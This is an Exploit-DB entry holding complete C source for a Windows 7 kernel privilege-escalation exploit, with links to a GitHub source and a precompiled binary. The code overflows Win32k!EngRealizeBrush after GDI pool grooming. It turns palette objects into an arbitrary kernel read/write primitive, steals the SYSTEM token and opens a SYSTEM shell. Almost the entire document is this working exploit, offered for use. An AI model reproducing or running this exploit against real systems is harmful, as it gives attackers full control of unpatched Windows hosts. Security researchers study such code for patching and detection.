|
# E-DB Note: # + Source: https://github.com/sensepost/gdi-palettes-exp # + Binary: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42432.exe #include <Windows.h> #include <stdio.h> #include <winddi.h> #include <Psapi.h> //From http://stackoverflow.com/a/26414236 this defines the details of the NtAllocateVirtualMemory function //which we will use to map the NULL page in user space. typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect ); static HBITMAP bitmaps[2000]; static HPALETTE hp[2000]; HANDLE hpWorker, hpManager, hManager; BYTE *bits; // https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives //dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token typedef struct { DWORD UniqueProcessIdOffset; DWORD TokenOffset; } VersionSpecificConfig; //VersionSpecificConfig gConfig = { 0x0b4 , 0x0f8 }; //win 7 SP 1 VersionSpecificConfig gConfig = { 0x0b4 , 0x0f8 }; void SetAddress(UINT* address) { SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)address); } void WriteToAddress(UINT* data, DWORD len) { SetPaletteEntries((HPALETTE)hpWorker, 0, len, (PALETTEENTRY*)data); } UINT ReadFromAddress(UINT src, UINT* dst, DWORD len) { SetAddress((UINT *)&src); DWORD res = GetPaletteEntries((HPALETTE)hpWorker, 0, len, (LPPALETTEENTRY)dst); return res; } // Get base of ntoskrnl.exe UINT GetNTOsBase() { UINT Bases[0x1000]; DWORD needed = 0; UINT krnlbase = 0; if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) { krnlbase = Bases[0]; } return krnlbase; } // Get EPROCESS for System process UINT PsInitialSystemProcess() { // load ntoskrnl.exe UINT ntos = (UINT)LoadLibrary("ntkrnlpa.exe"); // get address of exported PsInitialSystemProcess variable UINT addr = (UINT)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess"); FreeLibrary((HMODULE)ntos); UINT res = 0; UINT ntOsBase = GetNTOsBase(); // subtract addr from ntos to get PsInitialSystemProcess offset from base if (ntOsBase) { ReadFromAddress(addr - ntos + ntOsBase, (UINT *)&res, sizeof(UINT) / sizeof(PALETTEENTRY));//0x169114 } return res; } // Get EPROCESS for current process UINT PsGetCurrentProcess() { UINT pEPROCESS = PsInitialSystemProcess();// get System EPROCESS // walk ActiveProcessLinks until we find our Pid LIST_ENTRY ActiveProcessLinks; ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(UINT), (UINT *)&ActiveProcessLinks, sizeof(LIST_ENTRY) / sizeof(PALETTEENTRY)); UINT res = 0; while (TRUE) { UINT UniqueProcessId = 0; // adjust EPROCESS pointer for next entry pEPROCESS = (UINT)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(UINT); // get pid ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (UINT *)&UniqueProcessId, sizeof(UINT) / sizeof(PALETTEENTRY)); // is this our pid? if (GetCurrentProcessId() == UniqueProcessId) { res = pEPROCESS; break; } // get next entry ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(UINT), (UINT *)&ActiveProcessLinks, sizeof(LIST_ENTRY) / sizeof(PALETTEENTRY)); // if next same as last, we reached the end if (pEPROCESS == (UINT)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(UINT)) break; } return res; } void fengshui() { HBITMAP bmp; // we need 2 object 0x7F4 for (int y = 0; y < 2000; y++) { //0x3A3 = 0xFe8 bmp = CreateBitmap(0x3A3, 1, 1, 32, NULL); bitmaps[y] = bmp; } //Spray LpszMenuName User object in GDI pool. Ustx // size 0x10+8 TCHAR st[0x32]; for (int s = 0; s < 2000; s++) { WNDCLASSEX Class2 = { 0 }; wsprintf(st, "Class%d", s); Class2.lpfnWndProc = DefWindowProc; Class2.lpszClassName = st; Class2.lpszMenuName = "Saif"; Class2.cbSize = sizeof(WNDCLASSEX); if (!RegisterClassEx(&Class2)) { printf("bad %d %d\r\n", s, GetLastError()); break; } } for (int s = 0; s < 2000; s++) { DeleteObject(bitmaps[s]); } for (int k = 0; k < 2000; k++) { //0x1A6 = 0x7f0+8 bmp = CreateBitmap(0x1A6, 1, 1, 32, NULL); bitmaps[k] = bmp; } HPALETTE hps; LOGPALETTE *lPalette; //0x1E3 = 0x7e8+8 lPalette = (LOGPALETTE*)malloc(sizeof(LOGPALETTE) + (0x1E3 - 1) * sizeof(PALETTEENTRY)); lPalette->palNumEntries = 0x1E3; lPalette->palVersion = 0x0300; // for allocations bigger than 0x98 its Gh08 for less its always 0x98 and the tag is Gla18 for (int k = 0; k < 2000; k++) { hps = CreatePalette(lPalette); if (!hps) { printf("%s - %d - %d\r\n", "CreatePalette - Failed", GetLastError(), k); //return; } hp[k] = hps; } TCHAR fst[0x32]; for (int f = 500; f < 750; f++) { wsprintf(fst, "Class%d", f); UnregisterClass(fst, NULL); } } UINT GetAddress(BYTE *buf, UINT offset) { BYTE bytes[4]; for (int i = 0; i < 4; i++) { bytes[i] = buf[offset + i]; } UINT addr = *(UINT *)bytes; return addr; } int main(int argc, char *argv[]) { HWND hwnd; WNDCLASSEX Class = { 0 }; Class.lpfnWndProc = DefWindowProc; Class.lpszClassName = "Class"; Class.cbSize = sizeof(WNDCLASSEX); printf(" __ ________________ ____ ________\r\n"); printf(" / |/ / ___< /__ / / __ < /__ /\r\n"); printf(" / /|_/ /\__ \/ / / /_____/ / / / / / / \r\n"); printf(" / / / /___/ / / / /_____/ /_/ / / / / \r\n"); printf("/_/ /_//____/_/ /_/ \____/_/ /_/ \r\n"); printf("\r\n"); printf(" [*] By Saif (at) SensePost \r\n"); printf(" Twitter: Saif_Sherei\r\n"); printf("\r\n"); printf("\r\n"); if (!RegisterClassEx(&Class)) { printf("%s\r\n", "RegisterClass - Failed"); return 1; } hwnd = CreateWindowEx(NULL, "Class", "Test1", WS_VISIBLE, 0x5a1f, 0x5a1f, 0x5a1f, 0x5a1f, NULL, NULL, 0, NULL); HDC hdc = GetDC(hwnd); //0x10 is the magic number printf("[*] Creating Pattern Brush Bitmap.\r\n"); HBITMAP bitmap = CreateBitmap(0x23, 0x1d41d41, 1, 1, NULL); //HBITMAP bitmap = CreateBitmap(0x5aa, 0x11f, 1, 1, NULL); if (!bitmap) { printf("%s - %d\r\n", "CreateBitmap Failed.\r\n", GetLastError()); return 1; } //https://github.com/sam-b/HackSysDriverExploits/blob/master/HackSysNullPointerExploit/HackSysNullPointerExploit/HackSysNullPointerExploit.cpp HMODULE hNtdll = GetModuleHandle("ntdll.dll"); //Get address of NtAllocateVirtualMemory from the dynamically linked library and then cast it to a callable function type FARPROC tmp = GetProcAddress(hNtdll, "NtAllocateVirtualMemory"); PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)tmp; //We can't outright pass NULL as the address but if we pass 1 then it gets rounded down to 0... //PVOID baseAddress = (PVOID)0x1; PVOID baseAddress = (PVOID)0x1; SIZE_T regionSize = 0xFF; //Probably enough, it will get rounded up to the next page size // Map the null page NTSTATUS ntStatus = NtAllocateVirtualMemory( GetCurrentProcess(), //Current process handle &baseAddress, //address we want our memory to start at, will get rounded down to the nearest page boundary 0, //The number of high-order address bits that must be zero in the base address of the section view. Not a clue here ®ionSize, //Required size - will be modified to actual size allocated, is rounded up to the next page boundary MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, //claim memory straight away, get highest appropriate address PAGE_EXECUTE_READWRITE //All permissions ); if (ntStatus != 0) { printf("Virtual Memory Allocation Failed: 0x%x\n", ntStatus); FreeLibrary(hNtdll); return 1; } PVOID nullPointer = (PVOID)((UINT)0x4); *(PUINT)nullPointer = (UINT)1; // printf("[*] Creating Pattern Brush.\r\n"); HBRUSH hbrBkgnd = CreatePatternBrush(bitmap); SelectObject(hdc, hbrBkgnd); fengshui(); printf("[*] Triggering Overflow in Win32k!EngRealizeBrush.\r\n"); //__debugbreak(); PatBlt(hdc, 0x100, 0x10, 0x100, 0x100, PATCOPY); HRESULT res; bits = (BYTE*)malloc(0x6F8); for (int i = 0; i < 2000; i++) { res = GetBitmapBits(bitmaps[i], 0x6F8, bits); if (res > 0x6F8 - 1) { hManager = bitmaps[i]; printf("[*] Manager Bitmap: %d\r\n", i); break; } } //__debugbreak(); //Get pFirstColor of adjacent Gh?8 XEPALOBJ Palette object UINT pFirstColor = GetAddress(bits, 0x6F8 - 8); printf("[*] Original Current Manager XEPALOBJ->pFirstColor: 0x%x\r\n", pFirstColor); UINT cEntries = GetAddress(bits, 0x6F8 - 8 - 0x38); printf("[*] Original Manager XEPALOBJ->cEntries: 0x%x\r\n", cEntries); //BYTE *bytes = (BYTE*)&cEntries; for (int y = 0; y < 4; y++) { bits[0x6F8 - 8 - 0x38 + y] = 0xFF; } //__debugbreak(); SetBitmapBits((HBITMAP)hManager, 0x6F8, bits); //__debugbreak(); res = GetBitmapBits((HBITMAP)hManager, 0x6F8, bits); UINT uEntries = GetAddress(bits, 0x6F8 - 8 - 0x38); printf("[*] Updated Manager XEPALOBJ->cEntries: 0x%x\r\n", uEntries); UINT *rPalette; rPalette = (UINT*)malloc((0x400 - 1) * sizeof(PALETTEENTRY)); memset(rPalette, 0x0, (0x400 - 1) * sizeof(PALETTEENTRY)); for (int k = 0; k < 2000; k++) { UINT res = GetPaletteEntries(hp[k], 0, 0x400, (LPPALETTEENTRY)rPalette); if (res > 0x3BB) { printf("[*] Manager XEPALOBJ Object Handle: 0x%x\r\n", hp[k]); hpManager = hp[k]; break; } } //__debugbreak(); //for (int y = 0x3F0; y < 0x400; y++) { // printf("%04x ", rPalette[y]); //} //printf("\r\n"); UINT wAddress = rPalette[0x3FE]; printf("[*] Worker XEPALOBJ->pFirstColor: 0x%04x.\r\n", wAddress); UINT tHeader = pFirstColor - 0x1000; tHeader = tHeader & 0xFFFFF000; printf("[*] Gh05 Address: 0x%04x.\r\n", tHeader); //__debugbreak(); SetAddress(&tHeader); //SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&tHeader); UINT upAddress; GetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (LPPALETTEENTRY)&upAddress); printf("[*] Updated Worker XEPALOBJ->pFirstColor: 0x%04x.\r\n", upAddress); UINT wBuffer[2]; for (int x = 0; x < 2000; x++) { GetPaletteEntries((HPALETTE)hp[x], 0, 2, (LPPALETTEENTRY)wBuffer); //Debug //if (wBuffer != 0xcdcdcdcd) { // Release //if (wBuffer[1] == 0x35316847) { if (wBuffer[1] >> 24 == 0x35) { hpWorker = hp[x]; printf("[*] Worker XEPALOBJ object Handle: 0x%x\r\n", hpWorker); printf("[*] wBuffer: %x\r\n", wBuffer[1]); break; } } UINT gHeader[8]; //gHeader = (UINT*)malloc((0x4 - 1) * sizeof(PALETTEENTRY)); //GetPaletteEntries((HPALETTE)hpWorker, 0, 4, (LPPALETTEENTRY)gHeader); ReadFromAddress(tHeader, gHeader, 8); //__debugbreak(); UINT oHeader = pFirstColor & 0xFFFFF000; printf("[*] Overflowed Gh05 Address: 0x%04x.\r\n", oHeader); UINT oValue = oHeader + 0x1C; //SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&oValue); UINT value; //GetPaletteEntries((HPALETTE)hpWorker, 0, 1, (LPPALETTEENTRY)&value); //printf("[*] Value: 0x%04x.\r\n", value); ReadFromAddress(oValue, &value, 1); //printf("[*] Gh05 Object Header:\r\n"); //printf(" %04x %04x %04x %04x\r\n", gHeader[0], gHeader[1], gHeader[2], gHeader[3]); //printf(" %04x %04x %04x %04x\r\n", gHeader[4], gHeader[5], gHeader[6], gHeader[7]); //SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&oHeader); gHeader[2] = value; gHeader[3] = 0; gHeader[7] = value; //SetPaletteEntries((HPALETTE)hpWorker, 0, 4, (PALETTEENTRY*)gHeader); UINT oHeaderdata[8]; ReadFromAddress(oHeader, oHeaderdata, 8); printf("[*] Gh05 Overflowed Object Header:\r\n"); printf(" %04x %04x %04x %04x\r\n", oHeaderdata[0], oHeaderdata[1], oHeaderdata[2], oHeaderdata[3]); printf(" %04x %04x %04x %04x\r\n", oHeaderdata[4], oHeaderdata[5], oHeaderdata[6], oHeaderdata[7]); printf("[*] Gh05 Fixed Object Header:\r\n"); printf(" %04x %04x %04x %04x\r\n", gHeader[0], gHeader[1], gHeader[2], gHeader[3]); printf(" %04x %04x %04x %04x\r\n", gHeader[4], gHeader[5], gHeader[6], gHeader[7]); SetAddress(&oHeader); //__debugbreak(); WriteToAddress(gHeader, 8); printf("[*] Fixed Overflowed Gh05 Object Header.\r\n"); //UINT uHeader[8]; //ReadFromAddress(oHeader, uHeader, 8); //printf("[*] Gh05 Overflowed Fixed Object Header:\r\n"); //printf(" %04x %04x %04x %04x\r\n", uHeader[0], uHeader[1], uHeader[2], uHeader[3]); //printf(" %04x %04x %04x %04x\r\n", uHeader[4], uHeader[5], uHeader[6], uHeader[7]); // get System EPROCESS UINT SystemEPROCESS = PsInitialSystemProcess(); //__debugbreak(); //fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS); UINT CurrentEPROCESS = PsGetCurrentProcess(); //__debugbreak(); //fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS); UINT SystemToken = 0; // read token from system process ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, &SystemToken, 1); fprintf(stdout, "[*] Got System Token: %x\r\n", SystemToken); // write token to current process UINT CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset; SetAddress(&CurProccessAddr); WriteToAddress(&SystemToken, 1); //__debugbreak(); printf("[*] Dropping in SYSTEM shell...\r\n\r\n"); // Done and done. We're System :) system("cmd.exe"); //getchar(); for (int f = 0; f < 2000; f++) { DeleteObject(bitmaps[f]); } for (int f = 0; f < 2000; f++) { DeleteObject(hp[f]); } TCHAR fst[0x32]; for (int f = 0; f < 500; f++) { wsprintf(fst, "Class%d", f); UnregisterClass(fst, NULL); } for (int f = 751; f < 2000; f++) { wsprintf(fst, "Class%d", f); UnregisterClass(fst, NULL); } ReleaseDC(hwnd, hdc); DeleteDC(hdc); DeleteObject(hbrBkgnd); DeleteObject(bitmap); FreeLibrary(hNtdll); //free(bitmaps); //VirtualFree(&baseAddress, regionSize, MEM_RELEASE); //DestroyWindow(hwnd); return 0; }
|
|
|